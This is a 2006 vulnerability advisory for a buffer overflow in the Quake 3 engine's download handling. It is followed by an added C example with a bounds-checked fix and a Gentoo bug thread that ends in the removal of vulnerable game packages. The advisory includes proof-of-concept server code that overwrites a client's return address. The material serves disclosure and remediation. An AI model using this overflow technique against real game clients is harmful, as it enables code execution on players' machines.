#######################################################################

                             Luigi Auriemma

Application:  Quake 3 engine
              http://www.idsoftware.com
              http://www.icculus.org/quake3/
Versions:     Quake 3 <= 1.32c
              Icculus.org Quake 3 <= revision 795
              other derived projects
Games:        there exist many games which use the Quake 3 engine and
              probably they are all vulnerable, but I'm not able and
              have no time to test them.
              A reasonably complete list of these games is available here:
              http://en.wikipedia.org/wiki/Quake_III_engine#Uses_of_the_engine
Platforms:    Windows, *nix, *BSD, Mac and others
Bug:          buffer-overflow in CL_ParseDownload
Exploitation: remote, versus client
Date:         02 Jun 2006
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

The Quake 3 engine is the famous game engine developed by id Software
(http://www.idsoftware.com) back in 1999, but it is still one of the
most used, licensed and played engines.
It was released as open source under the GPL license some months ago
and is now mainly maintained by Icculus (http://www.icculus.org/quake3/),
although many other derived projects exist.

#######################################################################

======
2) Bug
======

The CL_ParseDownload function located in code/client/cl_parse.c is used
by the clients for handling the download commands (svc_download)
received from the server.
The function uses a signed 16 bit number sent by the server for copying
raw data from the network to the data buffer of 16384 (MAX_MSGLEN)
bytes:

  void CL_ParseDownload ( msg_t *msg ) {
      int size;
      unsigned char data[MAX_MSGLEN];
      ...
      size = MSG_ReadShort ( msg );
      if (size > 0)
          MSG_ReadData( msg, data, size );
      ...

Some interesting details:
The (reassembled) packets handled by Quake 3 can be max 16384 bytes, but
it is possible to bypass this limit through the huffman compression used
automatically and transparently in the engine (thanx to Thilo Schulz).
In short, to exploit this bug it is enough to use 16384 NULL (0x00)
bytes, which occupy a very small amount of space, followed by the usual
"stuff" (return address to overwrite and shellcode).
The data copied with MSG_ReadData is raw, so there are no bad bytes to
avoid for the exploitation.
Note that the svc_download can be sent to the client at any moment, so
the client can be attacked also immediately after the end of the connect
handshake (just the first server's message).

#######################################################################

===========
3) The Code
===========

The server must be modified for sending the malformed svc_download
command, and it is possible to use the following instructions, which
demonstrate how to overwrite the return address with 0x61616161.
It's enough to place them in code/server/sv_client.c just after the
"// send the gamestate" comment at about line 575:

  // send the gamestate
  int i;
  MSG_WriteByte( &msg, svc_download );
  MSG_WriteShort( &msg, -1 );           // block != 0, for fast return
  MSG_WriteShort( &msg, 16384 + 32 );   // amount of bytes to copy
  for(i = 0; i < 16384; i++) {          // overwrite the data buffer
      MSG_WriteByte(&msg, 0x00);        // 0x00 for saving space
  }
  for(i = 0; i < 32; i++) {             // do the rest of the job
      MSG_WriteByte(&msg, 'a');         // return address: 0x61616161
  }
  SV_SendMessageToClient( &msg, client );
  return;

#######################################################################

======
4) Fix
======

Icculus will fix the code soon.
I have tried to contact id Software too but it's only time lost...
The developers of the other derived projects and games have not been
contacted (almost all the games are no longer supported and it would
take me a bit long to find and contact each single developer of the
other open source projects).

#######################################################################
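The advisory above shows the one decision CL_ParseDownload gets wrong: a server-controlled signed 16-bit chunk size is checked only for being positive, so any value up to 32767 is accepted for a 16384-byte stack buffer. The following is an added example, not code from the advisory, from Icculus or from ioquake3: it models that parsing step with cut-down stand-ins for msg_t, MSG_ReadShort and MSG_ReadData, puts the advisory's unchecked size decision next to a bounds-checked variant, and feeds both a constructed svc_download payload (including one with the advisory's 16384 + 32 size). The names parse_download_checked, make_download_msg, check_download and download_bytes_unchecked are this example's own, and the check it applies is an illustrative fix, not necessarily the one committed upstream.

```c
/* Added example for the CL_ParseDownload bug; not code from the advisory or
 * from the Quake 3 / ioquake3 sources.  msg_t, MSG_ReadShort and MSG_ReadData
 * are simplified stand-ins for the engine's functions, and the bounds check in
 * parse_download_checked() is an illustrative fix, not the upstream commit. */
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_MSGLEN 16384        /* size of the stack buffer in CL_ParseDownload */

typedef struct {
    const unsigned char *data;
    int cursize;                /* bytes in the (already reassembled) message */
    int readcount;              /* read cursor */
} msg_t;

/* Reads a signed 16-bit little-endian value; -1 on overrun, like the engine. */
static int MSG_ReadShort(msg_t *msg) {
    if (msg->readcount + 2 > msg->cursize) {
        msg->readcount = msg->cursize;
        return -1;
    }
    int16_t v = (int16_t)(msg->data[msg->readcount] | (msg->data[msg->readcount + 1] << 8));
    msg->readcount += 2;
    return v;
}

/* Copies len raw bytes out of the message.  The caller is responsible for the
 * size of dst, which is exactly the contract the advisory's code violates. */
static void MSG_ReadData(msg_t *msg, unsigned char *dst, int len) {
    memcpy(dst, msg->data + msg->readcount, (size_t)len);
    msg->readcount += len;
}

/* The advisory's logic reduced to the only decision it makes: with just
 * "size > 0" checked, any value up to 32767 is copied into a 16384-byte buffer. */
int download_bytes_unchecked(int size) {
    return size > 0 ? size : 0;
}

typedef enum { DL_OK = 0, DL_DROP = 1 } dl_result_t;

/* Hardened variant: the chunk size must lie within 0..MAX_MSGLEN and must not
 * exceed the bytes actually left in the message.  Anything else is treated as a
 * malformed message (the engine would call Com_Error(ERR_DROP, ...) here)
 * instead of reading past data[]. */
dl_result_t parse_download_checked(msg_t *msg, unsigned char data[MAX_MSGLEN], int *out_size) {
    int block = MSG_ReadShort(msg);     /* block number; not needed for the check */
    (void)block;
    int size = MSG_ReadShort(msg);

    *out_size = 0;
    if (size < 0 || size > MAX_MSGLEN)
        return DL_DROP;                 /* would overrun data[] (or is negative) */
    if (size > msg->cursize - msg->readcount)
        return DL_DROP;                 /* chunk claims more bytes than the message holds */
    if (size > 0)
        MSG_ReadData(msg, data, size);
    *out_size = size;
    return DL_OK;
}

/* Builds a constructed svc_download payload: block, size, then payload_len
 * filler bytes (0x41).  buf must hold at least 4 + payload_len bytes. */
msg_t make_download_msg(unsigned char *buf, int block, int size, int payload_len) {
    buf[0] = (unsigned char)(block & 0xff);
    buf[1] = (unsigned char)((block >> 8) & 0xff);
    buf[2] = (unsigned char)(size & 0xff);
    buf[3] = (unsigned char)((size >> 8) & 0xff);
    memset(buf + 4, 0x41, (size_t)payload_len);
    msg_t m = { buf, 4 + payload_len, 0 };
    return m;
}

/* Convenience wrapper: builds the message and runs the checked parser, returning
 * the number of bytes accepted or -1 if the message would be dropped. */
int check_download(int block, int size, int payload_len) {
    static unsigned char wire[4 + MAX_MSGLEN + 64];   /* room for the advisory's oversized chunk */
    unsigned char data[MAX_MSGLEN];
    int accepted = 0;
    if (payload_len < 0 || (size_t)payload_len > sizeof(wire) - 4)
        return -1;                                    /* constructed input too large for the demo buffer */
    msg_t m = make_download_msg(wire, block, size, payload_len);
    if (parse_download_checked(&m, data, &accepted) == DL_DROP)
        return -1;
    return accepted;
}

int main(void) {
    /* The advisory's packet shape: block -1, size 16384 + 32, then that many bytes. */
    printf("unchecked copy length: %d bytes into a %d-byte buffer\n",
           download_bytes_unchecked(16384 + 32), MAX_MSGLEN);
    printf("checked verdict:       %d (-1 = dropped)\n", check_download(-1, 16384 + 32, 16384 + 32));
    printf("100-byte chunk:        %d bytes accepted\n", check_download(1, 100, 100));
    printf("truncated message:     %d (-1 = dropped)\n", check_download(1, 200, 50));
    return 0;
}
```

The second check (size against the bytes remaining in the message) is not needed to stop the overflow the advisory describes, but it is the check a defender would want alongside it: the engine's MSG_ReadData otherwise trusts the declared length over the message's real length.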
A new one, which is still in [upstream] status.

Impact: possible execution of arbitrary code with a malicious server.

Description:
RunningBon has reported two vulnerabilities in the Quake 3 Engine, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a user's system.

1) A boundary error exists in the "CG_ServerCommand()" function when receiving long server commands. This can be exploited to cause a stack-based buffer overflow via overly long server commands sent from the server.

Successful exploitation may allow arbitrary code execution, but requires that the user is e.g. tricked into connecting to a malicious server.

2) A boundary error exists in the handling of CS_ITEMs sent from a server. This can be exploited to cause a stack-based buffer overflow by sending overly long values to the client.

Successful exploitation may allow arbitrary code execution, but requires that the user is e.g. tricked into connecting to a malicious server.

Solution: Only connect to trusted servers.

Provided and/or discovered by: RunningBon

Original Advisory:
http://milw0rm.com/exploits/1976
http://milw0rm.com/exploits/1977
So this bug is about 1.5 years old and still in [upstream] status... There still appear to be vulnerable packages in the tree. Actually I believe those should have been masked a long while ago. Any comments on how to proceed here?
At least the first bug has been fixed upstream. I dunno if the derivatives are fixed, too. We also ship games-fps/quake3-1.34_rc3 which should not be vulnerable anymore. There's no earlier version of quake3 stable. So if this were only about quake3, I'd say downgrade to ~2 and close RESO FIXED, no GLSA. I'm not changing anything b/c I'm not sure about the other two bugs and about updated ebuilds for the rest of the mentioned games. Can somebody help here?
I just checked the bugs mentioned in c#2: they are fixed in r813, that's way before the release of 1.34_rc3. So quake3 itself should be safe to use.
And the releases of rtcw, enemy-territory are about two months before the second advisories. I recommend masking them. games herd?
@games herd: I would like this bug to be resolved one way or another. Is anything still vulnerable, as far as you all can tell? Do we care if things are still vulnerable?
Is anyone against last-riting these packages? Should those that are stable be dropped to unstable?

games-fps/rtcw
games-fps/enemy-territory
games-fps/enemy-territory-etpro
games-fps/enemy-territory-omnibot
games-fps/enemy-territory-truecombat

It seems this bug was fixed for rtcw, which is unstable; however, all the other Quake 3 engine games are very difficult to confirm. Thanks.
(In reply to Aaron Bauman from comment #7)
> Is anyone against last-riting these packages? Should those that are stable
> be dropped to unstable?
>
> games-fps/rtcw
> games-fps/enemy-territory
> games-fps/enemy-territory-etpro
> games-fps/enemy-territory-omnibot
> games-fps/enemy-territory-truecombat
>
> It seems this bug was fixed for rtcw which is unstable, however, all the
> other Quake 3 engine games are very difficult to confirm. Thanks.

I still play both games occasionally. Although for rtcw I started using the open source alternative which can be found in the gamerlay-overlay (currently only single-player mode is supported by the ebuild):

https://cgit.gentoo.org/proj/gamerlay.git/tree/games-fps/rtcw

and for enemy-territory I'd love to see an ebuild in the tree for the open-source version (which is called etlegacy):

https://bugs.gentoo.org/530130
(In reply to Lars Wendler (Polynomial-C) from comment #8)
> (In reply to Aaron Bauman from comment #7)
> > Is anyone against last-riting these packages? Should those that are stable
> > be dropped to unstable?
> >
> > games-fps/rtcw
> > games-fps/enemy-territory
> > games-fps/enemy-territory-etpro
> > games-fps/enemy-territory-omnibot
> > games-fps/enemy-territory-truecombat
> >
> > It seems this bug was fixed for rtcw which is unstable, however, all the
> > other Quake 3 engine games are very difficult to confirm. Thanks.
>
> I still play both games occasionally. Although for rtcw I started using the
> open source alternative which can be found in the gamerlay-overlay (currently
> only single-player mode is supported by the ebuild):
>
> https://cgit.gentoo.org/proj/gamerlay.git/tree/games-fps/rtcw
>
> and for enemy-territory I'd love to see an ebuild in the tree for the
> open-source version (which is called etlegacy):
>
> https://bugs.gentoo.org/530130

So folks have alternatives, which is nice. I am thinking last-rites may be in order here. This vulnerability is extremely long standing.
Well, my brothers are playing enemy-territory nearly every day :/
Update: the original project is now handled by https://ioquake3.org/

From the home page:

What is ioquake3?
ioquake3 is a free software first person shooter engine based on the Quake 3: Arena and Quake 3: Team Arena source code. The source code is licensed under the GPL version 2, and was first released under that license by id software on August 20th, 2005. Since then, we have been cleaning it up, fixing bugs, and adding features.

Maybe there are some fixes regarding this bug.
The bug has been closed via the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=4203956ca175dab36cde87b104806e09410f7fbd

commit 4203956ca175dab36cde87b104806e09410f7fbd
Author:     Aaron Bauman <bman@gentoo.org>
AuthorDate: 2019-12-08 21:26:36 +0000
Commit:     Aaron Bauman <bman@gentoo.org>
CommitDate: 2019-12-08 21:27:54 +0000

    games-fps/{enemy-territory,rtcw}: drop vulnerable pkgs

    Closes: https://bugs.gentoo.org/135645
    Signed-off-by: Aaron Bauman <bman@gentoo.org>

 games-fps/enemy-territory-omnibot/Manifest          |   2 -
 .../enemy-territory-omnibot-0.85.ebuild             |  20 ----
 games-fps/enemy-territory-omnibot/metadata.xml      |  12 --
 games-fps/enemy-territory-truecombat/Manifest       |   2 -
 .../enemy-territory-truecombat-0.49b.ebuild         |  36 ------
 games-fps/enemy-territory-truecombat/metadata.xml   |   8 --
 games-fps/enemy-territory/Manifest                  |   3 -
 .../enemy-territory-2.60b-r1.ebuild                 | 124 ---------------------
 games-fps/enemy-territory/metadata.xml              |  11 --
 games-fps/rtcwmp-demo/Manifest                      |   1 -
 games-fps/rtcwmp-demo/files/rtcwmp-demo-ded.rc      |  24 ----
 games-fps/rtcwmp-demo/metadata.xml                  |  11 --
 games-fps/rtcwmp-demo/rtcwmp-demo-1.1-r2.ebuild     |  68 -----------
 games-fps/rtcwsp-demo/Manifest                      |   1 -
 games-fps/rtcwsp-demo/metadata.xml                  |  12 --
 games-fps/rtcwsp-demo/rtcwsp-demo-1.1b-r2.ebuild    |  55 ---------
 16 files changed, 390 deletions(-)